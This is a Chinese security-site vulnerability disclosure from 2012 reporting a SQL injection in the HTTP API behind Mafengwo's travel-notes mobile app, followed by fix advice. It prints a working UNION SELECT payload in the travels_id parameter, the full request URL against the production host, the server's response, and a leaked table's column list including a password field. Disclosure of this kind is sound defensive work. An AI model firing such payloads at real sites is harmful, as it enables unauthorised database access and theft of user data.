频道栏目
首页 > 安全 > 网站安全 > 正文

蚂蜂窝手机应用背后的HTTP API接口存在SQL注入漏洞及修复

2012-03-25 13:10:39           
收藏   我要投稿
蚂蜂窝手机应用背后的HTTP API接口存在SQL注入漏洞
 
同时在这里,非常严肃非常严肃地提醒所有手机应用的开发者,在开发对应的与服务器通讯的API接口时,不要认为加密数据传输就能安全大吉、对参数不加验证就使用!
详细说明:蚂蜂窝有几个手机应用,其中之一为旅行家游记。
 
通过反编译apk,www.2cto.com 发现其与服务器的HTTP API通讯接口:
http://www.mafengwo.cn/mobile/travelnotes/gettravels.php
 
虽然通讯过程采取了加密数据传输,但很容易模拟;其中通讯参数travels_id未经验证即进入SQL查询,导致SQL注入产生。
漏洞证明:

1、POC:
travels_id为“778079 and 1=2 union select 0,char(97,98,97,98,97,97,97,98,98,98,97,99,97),0,0,0,0,0,0,0,0,0,0--”(不含双引号)时的URL:
 
http://www.mafengwo.cn/mobile/travelnotes/gettravels.php?r=%7B%22sign%22%3A%22f7c8542ddf4533a09874d4f829123049%22%2C%22data%22%3A%7B%22travels_id%22%3A%22778079+and+1%3D2+union+select+0%2Cchar%2897%2C98%2C97%2C98%2C97%2C97%2C97%2C98%2C98%2C98%2C97%2C99%2C97%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0--%22%2C%22device_id%22%3A%22a984355c5vt74g%22%7D%7D
返回:
 
{"data":{"ret":1,"message":{"id":"ababaaabbbaca","content":"0","img_width":320,"img_list":[]}},"sign":"82b60326ab8a7bd4eb43912d371b34d0"}
 
 
2、证明注入问题存在证据:表travelguide_book含如下列:
id,p_mddid,mddid,name,p_mdd_name,mdd_name,icon,icon_big,ver,type,fee,product_id,file,size,password,publish,download,ob,ctime,lasttime
 
 
 
修复方案:
 
检查所有API接口,是否存在未检查参数等(在普通页面已执行但API层未执行的安全措施)的漏洞。
 
其余建议见“问题描述”。
 
另外给数个漏洞外的建议:
(1)请关闭服务器的错误显示
(2)请尽快升级用户系统,原因和CSDN历史问题相似
 
作者horseluke
上一篇:网易某分站多些SQL注射漏洞及修复
下一篇:.svn目录未设权限限制的漏洞利用总结(含修复方案)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站